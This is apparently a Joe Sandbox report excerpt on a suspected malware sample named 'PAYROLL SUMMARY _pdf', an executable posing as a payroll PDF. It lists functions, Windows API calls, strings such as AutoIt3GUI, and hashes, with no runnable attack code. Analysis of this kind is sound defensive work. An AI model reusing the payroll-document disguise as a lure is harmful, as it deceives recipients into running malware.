Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
Instruction ID: a599d468850c2a508920962cb92bbf8ad2aad23352aa9fd3472e8d68ce496c78
Opcode Fuzzy Hash: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
Instruction Fuzzy Hash: 2B014B75611205EFDB204FA6ED8CD6BBBACEF8A355720046AF84AC2260DA31CD10CA60

Function 002B54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B555E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: e0aeea77db566dc4b15b1db0c176181002efb0afd5af9cabea7cc35218b2fec3
Instruction ID: 222430b0b27ab90b247db51f08b57fd3a9b669a9571db7b7bbd0d3ffddc09a74
Opcode Fuzzy Hash: e0aeea77db566dc4b15b1db0c176181002efb0afd5af9cabea7cc35218b2fec3
Instruction Fuzzy Hash: BF015B35C21A29DBDF10EFE8E94C7EDBB78BB09752F400056E806B6140DB309960CBA5

Function 002A7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?,?,?,002A799D), ref: 002A766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?,?), ref: 002A768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?,?), ref: 002A7698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?), ref: 002A76A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?,?), ref: 002A76B4

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
Instruction ID: f825d0fa930cc7d8799030a1a98262796fc06c535ba6a150ebade95bd72da7d5
Opcode Fuzzy Hash: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
Instruction Fuzzy Hash: C701D4B2A11604BBDB104F58ED08BAA7BECEB85B51F144029FD05D2211EB31DE5097A4

Function 002A85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A8608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A8612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A8621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A8628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A863E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ee86d347d6181f2faf88918d8b85da10d6a873cb2277b229cf125ca7b07e2ad8
Instruction ID: 003aa32a80b8f64a226cbef6f2d8df4428c63222a9e496852690e62ea6a74a29
Opcode Fuzzy Hash: ee86d347d6181f2faf88918d8b85da10d6a873cb2277b229cf125ca7b07e2ad8
Instruction Fuzzy Hash: 04F0CD30212215AFEB100FA4EE8DE6B3BACEF8AB55B04402AF90AC3150CF70DC51DA60

Function 002A8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A8673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A869F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
Instruction ID: 7d437cc71904fb9dcd65c1eeb623b5f53c9236c091be836cc6c5c8d959124840
Opcode Fuzzy Hash: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
Instruction Fuzzy Hash: F3F0AF70211215AFEB111FA4EC8CE677BACEF8AB55B140026F90AC2150CE70DD50DA60

Function 002AC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 002AC6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 002AC6D1
MessageBeep.USER32(00000000), ref: 002AC6E9
KillTimer.USER32(?,0000040A), ref: 002AC705
EndDialog.USER32(?,00000001), ref: 002AC71F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: a392e6c5c7ed412e234cd311f965a486cdff3b23a24884183223b181ac533023
Instruction ID: e203d3250ec207cd9bc22b8ebf71c9172f5551c560278c1f1703bd03509bbae4
Opcode Fuzzy Hash: a392e6c5c7ed412e234cd311f965a486cdff3b23a24884183223b181ac533023
Instruction Fuzzy Hash: 43014F30911704ABEB619F20ED4EB96B7BCBB01B05F14066AB552A18E1DBE0AD648E84

Function 002513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002513BF
StrokeAndFillPath.GDI32(?,?,0028BAD8,00000000,?), ref: 002513DB
SelectObject.GDI32(?,00000000), ref: 002513EE
DeleteObject.GDI32 ref: 00251401
StrokePath.GDI32(?), ref: 0025141C

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f76c4f9801ef8b60342eb9fb5f045df8806f49f74c562c9aa2e18ed123dfe33e
Instruction ID: f2298e7eddc31d41748596ffd49355cfe434640435bd189ac0aaf3ea92768f9a
Opcode Fuzzy Hash: f76c4f9801ef8b60342eb9fb5f045df8806f49f74c562c9aa2e18ed123dfe33e
Instruction Fuzzy Hash: 03F0E73041530DEBDB525FAAED0D7983FA9AB05327F04C225E82A994F1C73189B9DF58

Function 00262E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00270FF6: std::exception::exception.LIBCMT ref: 0027102C
Part of subcall function 00270FF6: __CxxThrowException@8.LIBCMT ref: 00271041

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Part of subcall function 00257BB1: _memmove.LIBCMT ref: 00257C0B

__swprintf.LIBCMT ref: 0026302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00262EC6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: f07b12ddcc9fa66b4bad6e2bea78d682d358b1120afdce0cac5b3d1d45706314
Instruction ID: a70e910108d2ec3450b9cbadfd9fb0367a42b59e2a29e822d7217b09d7b7b365
Opcode Fuzzy Hash: f07b12ddcc9fa66b4bad6e2bea78d682d358b1120afdce0cac5b3d1d45706314
Instruction Fuzzy Hash: 0D918E311283129FCB18EF24D895C6EB7E4EF95750F00491DF846972A1DA70EEA8CB56

Function 002BBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 002548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002548A1,?,?,002537C0,?), ref: 002548CE

CoInitialize.OLE32(00000000), ref: 002BBC26
CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BBC3F
CoUninitialize.OLE32 ref: 002BBC5C

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

Strings

.lnk, xrefs: 002BBC08, 002BBC16

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 4c8e8a29c4e8331dea26b451e1323666470db8a960f397cd2bf107010629ee4c
Instruction ID: 34307c3806cc993d706d941679be0ea9b80145e34b32a9d1b71864447832ee1d
Opcode Fuzzy Hash: 4c8e8a29c4e8331dea26b451e1323666470db8a960f397cd2bf107010629ee4c
Instruction Fuzzy Hash: 53A153356143029FCB00DF14C884DAABBE5FF89315F148989F89A9B3A1CB71ED59CB91

Function 002AB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 002AB981

Strings

%., xrefs: 002ABA24
AutoIt3GUI, xrefs: 002AB8F9
Container, xrefs: 002AB8FE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%.
API String ID: 3565006973-783795609
Opcode ID: a71d8924f6318fd44662d34e54e26739f38258b3b7a3eb420b70b706de9e180f
Instruction ID: e7bbdf36bd1bdcb7c1623646d383756b95ffe03c02b31fbba159abe813b631b1
Opcode Fuzzy Hash: a71d8924f6318fd44662d34e54e26739f38258b3b7a3eb420b70b706de9e180f
Instruction Fuzzy Hash: BA913D746202019FDB15CF68C884B66B7E9FF4A710F24856EE949CB6A2DF70E854CB50

Function 0027524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002752DD

Part of subcall function 00280340: __87except.LIBCMT ref: 0028037B

Strings

pow, xrefs: 002752B5, 002752D2

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 386b8642baf1349f292a1feda3df57b0fe64d5fb1dee0dc80ace1535e47eb557
Instruction ID: fd1e63a3ca05c95faca90c678f8daf88ad7fb2c9dea8d49226d651466b2ae977
Opcode Fuzzy Hash: 386b8642baf1349f292a1feda3df57b0fe64d5fb1dee0dc80ace1535e47eb557
Instruction Fuzzy Hash: E9519B24E3BA0387D7517F24D98137EA7949B00350F24C999E48D461E6EFF48CF89B41

Function 0027023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00270280
+, xrefs: 00270277

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 124f0f7cc8ecf1fdd2ef3fece5876ec3e04e830814c4b5b70600677e5adc6a8f
Instruction ID: 00883bead3db4598038341ce982b5763e4dd46e4b36f88b50db86c20a22fa692
Opcode Fuzzy Hash: 124f0f7cc8ecf1fdd2ef3fece5876ec3e04e830814c4b5b70600677e5adc6a8f
Instruction Fuzzy Hash: A4515635524A66CFCF15DF28C488AFA7BA4EF16310F144095FC959B2A0DB749C6ACB60

Function 00263297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002633D7
_memmove.LIBCMT ref: 00263470
_free.LIBCMT ref: 00263496
_memmove.LIBCMT ref: 00263549

Strings

Oa&, xrefs: 00263482

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove$_free
String ID: Oa&
API String ID: 2620147621-711773428
Opcode ID: 54d97a810a10fd86bec4907b571eeff3337c33ca488d31c28c8bcb62bc39230c
Instruction ID: c1b6e297ba9f518982c99fcb5db8e0539afcd6fdf78a0528f4ef00337702adb5
Opcode Fuzzy Hash: 54d97a810a10fd86bec4907b571eeff3337c33ca488d31c28c8bcb62bc39230c
Instruction Fuzzy Hash: F5516D719283429FDB24CF28C491B2BBBE5BF89314F44492DE98A87351DB31D961CF82

Function 002662F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002663A8
_memmove.LIBCMT ref: 00266446
_memset.LIBCMT ref: 0026646A

Strings

ERCP, xrefs: 00266313

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 78e5acc1d245390988eaeda15a499a07935ec29cf3684da7a846a6885981f070
Instruction ID: 7350ee9039fe9a3f7e981fc1eaab5cb54193f096809020b2973bcd90cbcf0c65
Opcode Fuzzy Hash: 78e5acc1d245390988eaeda15a499a07935ec29cf3684da7a846a6885981f070
Instruction Fuzzy Hash: DA51B27192030ADBDB24CF65C8957AABBF4FF04714F20856EE94ACB281EB7195A4CB40

Function 002D7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002DF910,00000000,?,?,?,?), ref: 002D7C4E
GetWindowLongW.USER32 ref: 002D7C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D7C7B

Strings

SysTreeView32, xrefs: 002D7C20

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 86c8131927d6d6e5a1a9870f4654a9fd0b77b0bb2d628ebd1c16caf8bb9dd4d3
Instruction ID: bf40bb43bedb43589d43ff99bb5d5af6c99ee83fea3a7c63734888a84d9ba307
Opcode Fuzzy Hash: 86c8131927d6d6e5a1a9870f4654a9fd0b77b0bb2d628ebd1c16caf8bb9dd4d3
Instruction Fuzzy Hash: 7331B031624206AFDB118F34DC45BEA77A9EB09324F244727F875932E0D735EC659B50

Function 002D7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002D76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002D76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 002D7708

Strings

SysMonthCal32, xrefs: 002D769B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 4bbe723f77dfdf482709c77d178ea62b3953b17589f2448d8e19fbf37d537b30
Instruction ID: 42a82cd6097c504bc7f68ea82c030264190255c9cfba9fc4edce6dca42a016e5
Opcode Fuzzy Hash: 4bbe723f77dfdf482709c77d178ea62b3953b17589f2448d8e19fbf37d537b30
Instruction Fuzzy Hash: 77219132514219ABDF118E94CC46FEA3B69EF48754F110215FE156B2D0E6B5EC609BA0

Function 002D6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002D6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002D6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002D6FDF

Strings

Listbox, xrefs: 002D6F77

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f02c2d1cc85201461c62a09dac246fd951f3e8afe12b2d4784e7eaed99ab5c68
Instruction ID: bebd0f915a721e990b2518df307d7d25d63bdc2882e4d349b4861b903107b0b7
Opcode Fuzzy Hash: f02c2d1cc85201461c62a09dac246fd951f3e8afe12b2d4784e7eaed99ab5c68
Instruction Fuzzy Hash: E521D732621119BFDF118F54DC89FEB377AEF89750F018125F91597690C671AC61CBA0

Function 002D797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002D79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002D79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002D7A03

Strings

msctls_trackbar32, xrefs: 002D79B8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

